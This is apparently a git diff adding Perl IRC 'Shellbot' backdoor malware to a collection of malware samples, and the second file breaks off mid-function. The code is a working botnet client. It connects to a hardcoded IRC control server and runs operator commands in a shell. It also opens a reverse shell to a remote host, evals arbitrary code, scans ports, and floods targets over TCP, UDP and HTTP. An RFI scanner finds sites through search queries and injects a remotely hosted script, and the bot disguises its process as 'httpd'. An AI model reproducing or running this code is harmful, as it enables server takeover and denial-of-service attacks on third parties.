+       my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
+       if ($args =~ /^\001VERSION\001$/) {
+         notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
+       }
+       if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
+       if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
+         if ($onde eq "$meunick"){
+           shell("$pn", "$args");
+         }
+         if ($args =~ /^(\Q$meunick\E|\!eft)\s+(.*)/ ) {
+            my $natrix = $1;
+            my $arg = $2;
+            if ($arg =~ /^\!(.*)/) {
+              ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
+            } elsif ($arg =~ /^\@(.*)/) {
+                $ondep = $onde;
+                $ondep = $pn if $onde eq $meunick;
+                bfunc("$ondep","$1");
+            } else {
+                shell("$onde", "$arg");
+            }
+         }
+       }
+}
+}
+    elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
+       if (lc($1) eq lc($meunick)) {
+         $meunick=$4;
+         $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+       }
+   } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
+       nick("$meunick|".int rand(999999));
+   } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
+       $meunick = $2;
+       $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+       $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
+       foreach my $canal (@canais) {
+         sendraw("JOIN $canal ddosit");
+       }
+   }
+}
+
+# MORGAN OWNED YOUR BOX 
+# www.morganxpl.com
+# morgan.rx@gmail.com
+sub bfunc {
+  my $printl = $_[0];
+  my $funcarg = $_[1];
+  if (my $pid = fork) {
+     waitpid($pid, 0);
+  } else {
+      if (fork) {
+         exit;
+       } else {
+           if ($funcarg =~ /^portscan (.*)/) {
+             my $hostip="$1";
+             my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
+             my (@aberta, %porta_banner);
+     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[SCAN]\003\002 Scanning ".$1." for open ports.");
+             foreach my $porta (@portas)  {
+                my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
+                if ($scansock) {
+                   push (@aberta, $porta);
+                   $scansock->close;
+                }
+             }
+
+             if (@aberta) {
+               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[SCAN]\003\002 Open port(s): @aberta");
+             } else {
+               sendraw($IRC_cur_socket,"PRIVMSG $printl :\002\0034[SCAN]\003\002 No open ports found");
+             }
+           }
+           if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
+     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[TCP DDoSing]\003\002 Attacking ".$1.":".$2." for ".$3." seconds.");
+     my $itime = time;
+     my ($cur_time);
+             $cur_time = time - $itime;
+     while ($3>$cur_time){
+             $cur_time = time - $itime;
+     &tcpflooder("$1","$2","$3");
+             }
+     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[TCP DDoSing]\003\002 Attack done ".$1.":".$2.".");
+           }
+   if ($funcarg =~ /^version/) {
+sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[VERSION]\003\002 w0rmb0t ver ".$VERSAO);
+}
+
+if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
+my $host = "$1";
+my $porta = "$2";
+my $proto = getprotobyname('tcp');
+my $iaddr = inet_aton($host);
+my $paddr = sockaddr_in($porta, $iaddr);
+my $shell = "/bin/sh -i";
+if ($^O eq "MSWin32") {
+$shell = "cmd.exe";
+}
+socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
+connect(SOCKET, $paddr) or die "connect: $!";
+open(STDIN, ">&SOCKET");
+open(STDOUT, ">&SOCKET");
+open(STDERR, ">&SOCKET");
+system("$shell");
+close(STDIN);
+close(STDOUT);
+close(STDERR);
+
+if ($estatisticas)
+{
+sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[BackConnect]\003\002: Connecting to $host:$porta");
+}
+}
+#SCANNER 
+           if ($funcarg =~ /^rfiscan\s+(\d+)\s+(.*)/) {
+	     $boturl=$2;
+   sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034Scan\003\002 ╗ Scanning for Remote file inclusion using \002 ".$boturl." \002 for \002 ".$1." seconds.");
+     srand;
+     my $itime = time;
+     my ($cur_time);
+     my ($exploited);
+	     $boturl=$2;
+             $cur_time = time - $itime;$exploited = 0;
+while($1>$cur_time){
+    $cur_time = time - $itime;
+    @urls=fetch();
+foreach $url (@urls) {
+$cur_time = time - $itime;
+ #sendraw($IRC_cur_socket, "PRIVMSG #debug :\002\0034[x|Exploiting]\003\002 ".$url2."\n\n");
+my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
+$url2 ="http://".$path."/".$boturl."@cmdgif?";
+print "\n".$url2."\n\n";
+
+
+# MORGAN OWNED YOUR BOX 
+# www.morganxpl.com
+# morgan.rx@gmail.com
+
+my $req=HTTP::Request->new(GET=>$url2);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(10);
+my $response=$ua->request($req);
+
+if ($response->is_success) {
+ if( $response->content =~ /By/ && $response->content =~ /Morgan/ ){
+ sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[Vulnerable]\003\002 ".$url2."\n\n");
+}
+}
+else {
+}
+ }
+}
+     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[Finished]\003\002 Scan finished in ".$1." seconds.");
+           }
+           if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
+     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[HTTP DDoSing]\003\002 Attacking ".$1.":80 for ".$2." seconds.");
+     my $itime = time;
+     my ($cur_time);
+             $cur_time = time - $itime;
+     while ($2>$cur_time){
+             $cur_time = time - $itime;
+     my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
+             print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
+     close($socket);
+             }
+     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[HTTP]\003\002 Attacking done ".$1.".");
+           }
+           if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[UDP DDoSing]\003\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds.");
+             my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
+             $dtime = 1 if $dtime == 0;
+             my %bytes;
+             $bytes{igmp} = $2 * $pacotes{igmp};
+             $bytes{icmp} = $2 * $pacotes{icmp};
+             $bytes{o} = $2 * $pacotes{o};
+             $bytes{udp} = $2 * $pacotes{udp};
+             $bytes{tcp} = $2 * $pacotes{tcp};
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP-DDOS]\002 Mщdia ".int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)/$dtime)." Kb in ".$dtime." seconds to ".$1.".");
+           }
+           exit;
+       }
+  }
+}
+# MORGAN OWNED YOUR BOX 
+# www.morganxpl.com
+# morgan.rx@gmail.com
+sub ircase {
+  my ($kem, $printl, $case) = @_;
+
+  if ($case =~ /^join (.*)/) {
+     j("$1");
+   }
+   if ($case =~ /^part (.*)/) {
+      p("$1");
+   }
+   if ($case =~ /^rejoin\s+(.*)/) {
+      my $chan = $1;
+      if ($chan =~ /^(\d+) (.*)/) {
+        for (my $ca = 1; $ca <= $1; $ca++ ) {
+          p("$2");
+          j("$2");
+        }
+      } else {
+          p("$chan");
+          j("$chan");
+      }
+   }
+   if ($case =~ /^op/) {
+      op("$printl", "$kem") if $case eq "op";
+      my $oarg = substr($case, 3);
+      op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if ($case =~ /^deop/) {
+      deop("$printl", "$kem") if $case eq "deop";
+      my $oarg = substr($case, 5);
+      deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if ($case =~ /^msg\s+(\S+) (.*)/) {
+      msg("$1", "$2");
+   }
+   if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
+      for (my $cf = 1; $cf <= $1; $cf++) {
+        msg("$2", "$3");
+      }
+   }
+   if ($case =~ /^ctcp\s+(\S+) (.*)/) {
+      ctcp("$1", "$2");
+   }
+   if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
+      for (my $cf = 1; $cf <= $1; $cf++) {
+        ctcp("$2", "$3");
+      }
+   }
+   if ($case =~ /^nick (.*)/) {
+      nick("$1");
+   }
+   if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
+       conectar("$2", "$1", 6667);
+   }
+   if ($case =~ /^raw (.*)/) {
+      sendraw("$1");
+   }
+   if ($case =~ /^eval (.*)/) {
+     eval "$1";
+   }
+}
+# MORGAN OWNED YOUR BOX 
+# www.morganxpl.com
+# morgan.rx@gmail.com
+sub shell {
+  my $printl=$_[0];
+  my $comando=$_[1];
+  if ($comando =~ /cd (.*)/) {
+    chdir("$1") || msg("$printl", "No such file or directory");
+    return;
+  }
+  elsif ($pid = fork) {
+     waitpid($pid, 0);
+  } else {
+      if (fork) {
+         exit;
+       } else {
+           my @resp=`$comando 2>&1 3>&1`;
+           my $c=0;
+           foreach my $linha (@resp) {
+             $c++;
+             chop $linha;
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
+             if ($c == "$linas_max") {
+               $c=0;
+               sleep $sleep;
+             }
+           }
+           exit;
+       }
+  }
+}
+# MORGAN OWNED YOUR BOX 
+# www.morganxpl.com
+# morgan.rx@gmail.com
+sub tcpflooder {
+ my $itime = time;
+ my ($cur_time);
+ my ($ia,$pa,$proto,$j,$l,$t);
+ $ia=inet_aton($_[0]);
+ $pa=sockaddr_in($_[1],$ia);
+ $ftime=$_[2];
+ $proto=getprotobyname('tcp');
+ $j=0;$l=0;
+ $cur_time = time - $itime;
+ while ($l<1000){
+  $cur_time = time - $itime;
+  last if $cur_time >= $ftime;
+  $t="SOCK$l";
+  socket($t,PF_INET,SOCK_STREAM,$proto);
+  connect($t,$pa)||$j--;
+  $j++;$l++;
+ }
+ $l=0;
+ while ($l<1000){
+  $cur_time = time - $itime;
+  last if $cur_time >= $ftime;
+  $t="SOCK$l";
+  shutdown($t,2);
+  $l++;
+ }
+}
+# MORGAN OWNED YOUR BOX 
+# www.morganxpl.com
+# morgan.rx@gmail.com
+sub udpflooder {
+  my $iaddr = inet_aton($_[0]);
+  my $msg = 'A' x $_[1];
+  my $ftime = $_[2];
+  my $cp = 0;
+  my (%pacotes);
+  $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
+
+  socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
+
+  socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
+  socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
+  socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
+  return(undef) if $cp == 4;
+  my $itime = time;
+  my ($cur_time);
+  while ( 1 ) {
+     for (my $porta = 1; $porta <= 65000; $porta++) {
+       $cur_time = time - $itime;
+       last if $cur_time >= $ftime;
+       send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
+       send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
+       send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
+       send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
+
+       for (my $pc = 3; $pc <= 255;$pc++) {
+         next if $pc == 6;
+         $cur_time = time - $itime;
+         last if $cur_time >= $ftime;
+         socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
+         send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
+       }
+ }
+     last if $cur_time >= $ftime;
+  }
+  return($cur_time, %pacotes);
+}
+
+sub ctcp {
+   return unless $#_ == 1;
+   sendraw("PRIVMSG $_[0] :\001$_[1]\001");
+}
+sub msg {
+   return unless $#_ == 1;
+   sendraw("PRIVMSG $_[0] :$_[1]");
+}
+sub notice {
+   return unless $#_ == 1;
+   sendraw("NOTICE $_[0] :$_[1]");
+}
+sub op {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +o $_[1]");
+}
+sub deop {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] -o $_[1]");
+}
+sub j { &join(@_); }
+sub join {
+   return unless $#_ == 0;
+   sendraw("JOIN $_[0]");
+}
+sub p { part(@_); }
+sub part {
+  sendraw("PART $_[0]");
+}
+sub nick {
+  return unless $#_ == 0;
+  sendraw("NICK $_[0]");
+}
+sub quit {
+  sendraw("QUIT :$_[0]");
+}
+
+# MORGAN OWNED YOUR BOX 
+# www.morganxpl.com
+# morgan.rx@gmail.com
+
+sub fetch(){
+    my $rnd=(int(rand(9999)));
+    my $n= 80;
+    if ($rnd<5000) { $n<<=1;}
+    my $s= (int(rand(10)) * $n);
+{
+my @dominios = ("removed-them-all");
+my @str;
+
+foreach $dom  (@dominios)
+{
+	push (@str,"@gstring");
+}
+
+    my $query="www.google.com/search?q=";
+    $query.=$str[(rand(scalar(@str)))];
+    $query.="&num=$n&start=$s";
+    my @lst=();
+#sendraw("privmsg #Morgan :DEBUG only test googling: ".$query.""); 
+    my $page = http_query($query);
+    while ($page =~  m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
+if ($1 !~ m/google|cache|translate/){
+    push (@lst,$1);
+}
+    }
+    return (@lst);
+}
+
+sub http_query($){
+    my ($url) = @_;
+    my $host=$url;
+    my $query=$url;
+    my $page="";
+    $host =~ s/href=\"?http:\/\///;
+    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+    $query =~s/$host//;
+    if ($query eq "") {$query="/";};
+    eval {
+local $SIG{ALRM} = sub { die "1";};
+alarm 10;
+my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
+print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
+my @r = <$sock>;
+$page="@r";
+alarm 0;
+close($sock);
+    };
+
+   return $page;
+}
+}
+# MORGAN OWNED YOUR BOX 
+# www.morganxpl.com
+# morgan.rx@gmail.com
+
+# NOTE: DONT REMOVE COPYRIGHTS
\ No newline at end of file
diff --git a/Perl/Backdoor.Perl.Shellbot.ah b/Perl/Backdoor.Perl.Shellbot.ah
new file mode 100644
index 00000000..60089c16
--- /dev/null
+++ b/Perl/Backdoor.Perl.Shellbot.ah
@@ -0,0 +1,568 @@
+# SHELLBOT WITH VULNSCAN
+# by destructive
+# GREETINGZ:
+# NOBODY, BECAUSE NOBODY HELPED US
+#
+#
+#
+# VISIT US ~
+# IRC Network: irc.GigaChat.net
+# IRC Channel: #Atk33
+#
+#
+#
+#
+# pwn3d' 
+
+my $processo = 'httpd';
+use HTTP::Request;
+use LWP::UserAgent;
+
+#CONFIGURATION
+my $linas_max='4';
+my $sleep='5';
+my @cmdstring='http://raidenzin.freehostia.com/list.txt?';
+my @adms=("Raiden","Morientes");
+my @canais=("#Own");
+my $nick='negrinhos';
+my $ircname ='negrinhos';
+
+chop (my $realname = `id`);
+$servidor='211.220.193.249' unless $servidor;
+my $porta='1999';
+my $VERSAO = 'Shellbot RFI by destructive v1.0';
+$SIG{'INT'} = 'IGNORE';
+$SIG{'HUP'} = 'IGNORE';
+$SIG{'TERM'} = 'IGNORE';
+$SIG{'CHLD'} = 'IGNORE';
+$SIG{'PS'} = 'IGNORE';
+use IO::Socket;
+use Socket;
+use IO::Select;
+chdir("/");
+$servidor="$ARGV[0]" if $ARGV[0];
+$0="$processo"."\0"x16;;
+my $pid=fork;
+exit if $pid;
+die "Problema com o fork: $!" unless defined($pid);
+
+
+our %irc_servers;
+our %DCC;
+my $dcc_sel = new IO::Select->new();
+
+$sel_cliente = IO::Select->new();
+sub sendraw {
+  if ($#_ == '1') {
+    my $socket = $_[0];
+    print $socket "$_[1]\n";
+  } else {
+      print $IRC_cur_socket "$_[0]\n";
+  }
+}
+
+sub conectar {
+   my $meunick = $_[0];
+   my $servidor_con = $_[1];
+   my $porta_con = $_[2];
+
+   my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
+   if (defined($IRC_socket)) {
+     $IRC_cur_socket = $IRC_socket;
+
+     $IRC_socket->autoflush(1);
+     $sel_cliente->add($IRC_socket);
+
+     $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
+     $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
+     $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+     $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
+     nick("$meunick");
+     sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
+     sleep 1;
+   }
+}
+my $line_temp;
+while( 1 ) {
+   while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
+   delete($irc_servers{''}) if (defined($irc_servers{''}));
+   my @ready = $sel_cliente->can_read(0);
+   next unless(@ready);
+   foreach $fh (@ready) {
+     $IRC_cur_socket = $fh;
+     $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
+     $nread = sysread($fh, $msg, 4096);
+     if ($nread == 0) {
+        $sel_cliente->remove($fh);
+        $fh->close;
+        delete($irc_servers{$fh});
+     }
+     @lines = split (/\n/, $msg);
+
+     for(my $c=0; $c<= $#lines; $c++) {
+       $line = $lines[$c];
+       $line=$line_temp.$line if ($line_temp);
+       $line_temp='';
+       $line =~ s/\r$//;
+       unless ($c == $#lines) {
+         parse("$line");
+       } else {
+           if ($#lines == 0) {
+             parse("$line");
+           } elsif ($lines[$c] =~ /\r$/) {
+               parse("$line");
+           } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
+               parse("$line");
+           } else {
+               $line_temp = $line;
+           }
+       }
+      }
+   }
+}
+
+sub parse {
+   my $servarg = shift;
+   if ($servarg =~ /^PING \:(.*)/) {
+     sendraw("PONG :$1");
+   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
+       my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
+       if ($args =~ /^\001VERSION\001$/) {
+         notice("$pn", "\001VERSION mIRC v6.17 Khaled Mardam-Bey\001");
+       }
+       if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
+         if ($onde eq "$meunick"){
+           shell("$pn", "$args");
+         }
+         if ($args =~ /^(\Q$meunick\E|\!crew)\s+(.*)/ ) {
+            my $natrix = $1;
+            my $arg = $2;
+            if ($arg =~ /^\!(.*)/) {
+              ircase("$pn","$onde","$1") unless ($natrix eq "!crew" and $arg =~ /^\!nick/);
+            } elsif ($arg =~ /^\@(.*)/) {
+                $ondep = $onde;
+                $ondep = $pn if $onde eq $meunick;
+                bfunc("$ondep","$1");
+            } else {
+                shell("$onde", "$arg");
+            }
+         }
+
+       }
+}
+    elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
+       if (lc($1) eq lc($meunick)) {
+         $meunick=$4;
+         $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+       }
+   } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
+       nick("$meunick|".int rand(999999));
+   } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
+       $meunick = $2;
+       $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+       $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
+       foreach my $canal (@canais) {
+         sendraw("JOIN $canal ddosit");
+       }
+   }
+}
+
+
+sub bfunc {
+  my $printl = $_[0];
+  my $funcarg = $_[1];
+  if (my $pid = fork) {
+     waitpid($pid, 0);
+  } else {
+      if (fork) {
+         exit;
+       } else {
+           if ($funcarg =~ /^portscan (.*)/) {
+             my $hostip="$1";
+             my 
+
+@portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","66
+
+69","7000","8080","8018");
+             my (@aberta, %porta_banner);
+     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");
+             foreach my $porta (@portas)  {
+                my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
+                if ($scansock) {
+                   push (@aberta, $porta);
+                   $scansock->close;
+                }
+             }
+
+             if (@aberta) {
+               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
+             } else {
+               sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found");
+             }
+           }
+           if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
+     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
+     my $itime = time;
+     my ($cur_time);
+             $cur_time = time - $itime;
+     while ($3>$cur_time){
+             $cur_time = time - $itime;
+     &tcpflooder("$1","$2","$3");
+             }
+     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2.".");
+           }
+   if ($funcarg =~ /^version/) {
+sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 w0rmb0t ver ".$VERSAO);
+}
+#SCANNER 
+           if ($funcarg =~ /^scan\s+(\d+)\s+(.*)\s+(.*)/) {
+            @gstring = $3;
+	     $boturl=$2;
+   sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[Atk33]\002 Scan started. CMD: \002 @cmdstring \002 ");
+     srand;
+     my $itime = time;
+     my ($cur_time);
+     my ($exploited);
+	     $boturl=$2;
+             $cur_time = time - $itime;$exploited = 0;
+while($1>$cur_time){
+    $cur_time = time - $itime;
+    @urls=fetch();
+foreach $url (@urls) {
+$cur_time = time - $itime;
+ #sendraw($IRC_cur_socket, "PRIVMSG #debug :\002[Exploiting]\002 ".$url2."\n\n");
+my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
+$url2 ="http://".$path."/".$boturl."@cmdstring?";
+
+print "\n".$url2."\n\n";
+
+
+
+my $req=HTTP::Request->new(GET=>$url2);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(10);
+my $response=$ua->request($req);
+
+if ($response->is_success) {
+ if( $response->content =~ /By/ && $response->content =~ /destructive/ ){
+ sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[Results]\002 ".$url2."\n\n");
+}
+}
+else {
+    print 'Errore: ',$path,$response->status_line, "\n";
+}
+ }
+}
+     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[Finished]\002 Scan finished in ".$1." seconds.");
+           }
+           if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
+     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds.");
+     my $itime = time;
+     my ($cur_time);
+             $cur_time = time - $itime;
+     while ($2>$cur_time){
+             $cur_time = time - $itime;
+     my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
+             print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
+     close($socket);
+             }
+     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
+           }
+           if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for ".$3." 
+
+seconds.");
+             my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
+             $dtime = 1 if $dtime == 0;
+             my %bytes;
+             $bytes{igmp} = $2 * $pacotes{igmp};
+             $bytes{icmp} = $2 * $pacotes{icmp};
+             $bytes{o} = $2 * $pacotes{o};
+             $bytes{udp} = $2 * $pacotes{udp};
+             $bytes{tcp} = $2 * $pacotes{tcp};
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + 
+
+$bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
+           }
+           exit;
+       }
+  }
+}
+
+sub ircase {
+  my ($kem, $printl, $case) = @_;
+
+  if ($case =~ /^join (.*)/) {
+     j("$1");
+   }
+   if ($case =~ /^part (.*)/) {
+      p("$1");
+   }
+   if ($case =~ /^rejoin\s+(.*)/) {
+      my $chan = $1;
+      if ($chan =~ /^(\d+) (.*)/) {
+        for (my $ca = 1; $ca <= $1; $ca++ ) {
+          p("$2");
+          j("$2");
+        }
+      } else {
+          p("$chan");
+          j("$chan");
+      }
+   }
+   if ($case =~ /^op/) {
+      op("$printl", "$kem") if $case eq "op";
+      my $oarg = substr($case, 3);
+      op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if ($case =~ /^deop/) {
+      deop("$printl", "$kem") if $case eq "deop";
+      my $oarg = substr($case, 5);
+      deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if ($case =~ /^msg\s+(\S+) (.*)/) {
+      msg("$1", "$2");
+   }
+   if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
+      for (my $cf = 1; $cf <= $1; $cf++) {
+        msg("$2", "$3");
+      }
+   }
+   if ($case =~ /^ctcp\s+(\S+) (.*)/) {
+      ctcp("$1", "$2");
+   }
+   if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
+      for (my $cf = 1; $cf <= $1; $cf++) {
+        ctcp("$2", "$3");
+      }
+   }
+   if ($case =~ /^nick (.*)/) {
+      nick("$1");
+   }
+   if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
+       conectar("$2", "$1", 6667);
+   }
+   if ($case =~ /^raw (.*)/) {
+      sendraw("$1");
+   }
+   if ($case =~ /^eval (.*)/) {
+     eval "$1";
+   }
+}
+
+sub shell {
+  my $printl=$_[0];
+  my $comando=$_[1];
+  if ($comando =~ /cd (.*)/) {
+    chdir("$1") || msg("$printl", "No such file or directory");
+    return;
+  }
+  elsif ($pid = fork) {
+     waitpid($pid, 0);
+  } else {
+      if (fork) {
+         exit;
+       } else {
+           my @resp=`$comando 2>&1 3>&1`;
+           my $c=0;
+           foreach my $linha (@resp) {
+             $c++;
+             chop $linha;
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
+             if ($c == "$linas_max") {
+               $c=0;
+               sleep $sleep;
+             }
+           }
+           exit;
+       }
+  }
+}
+
+sub tcpflooder {
+ my $itime = time;
+ my ($cur_time);
+ my ($ia,$pa,$proto,$j,$l,$t);
+ $ia=inet_aton($_[0]);
+ $pa=sockaddr_in($_[1],$ia);
+ $ftime=$_[2];
+ $proto=getprotobyname('tcp');
+ $j=0;$l=0;
+ $cur_time = time - $itime;
+ while ($l<1000){
+  $cur_time = time - $itime;
+  last if $cur_time >= $ftime;
+  $t="SOCK$l";
+  socket($t,PF_INET,SOCK_STREAM,$proto);
+  connect($t,$pa)||$j--;
+  $j++;$l++;
+ }
+ $l=0;
+ while ($l<1000){
+  $cur_time = time - $itime;
+  last if $cur_time >= $ftime;
+  $t="SOCK$l";
+  shutdown($t,2);
+  $l++;
+ }
+}
+
+sub udpflooder {
+  my $iaddr = inet_aton($_[0]);
+  my $msg = 'A' x $_[1];
+  my $ftime = $_[2];
+  my $cp = 0;
+  my (%pacotes);
+  $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
+
+  socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
+
+  socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
+  socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
+  socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
+  return(undef) if $cp == 4;
+  my $itime = time;
+  my ($cur_time);
+  while ( 1 ) {
+     for (my $porta = 1; $porta <= 65000; $porta++) {
+       $cur_time = time - $itime;
+       last if $cur_time >= $ftime;
+       send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
+       send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
+       send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
+       send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
+
+       for (my $pc = 3; $pc <= 255;$pc++) {
+         next if $pc == 6;
+         $cur_time = time - $itime;
+         last if $cur_time >= $ftime;
+         socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
+         send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
+       }
+ }
+     last if $cur_time >= $ftime;
+  }
+  return($cur_time, %pacotes);
+}
+
+sub ctcp {
+   return unless $#_ == 1;
+   sendraw("PRIVMSG $_[0] :\001$_[1]\001");
+}
+sub msg {
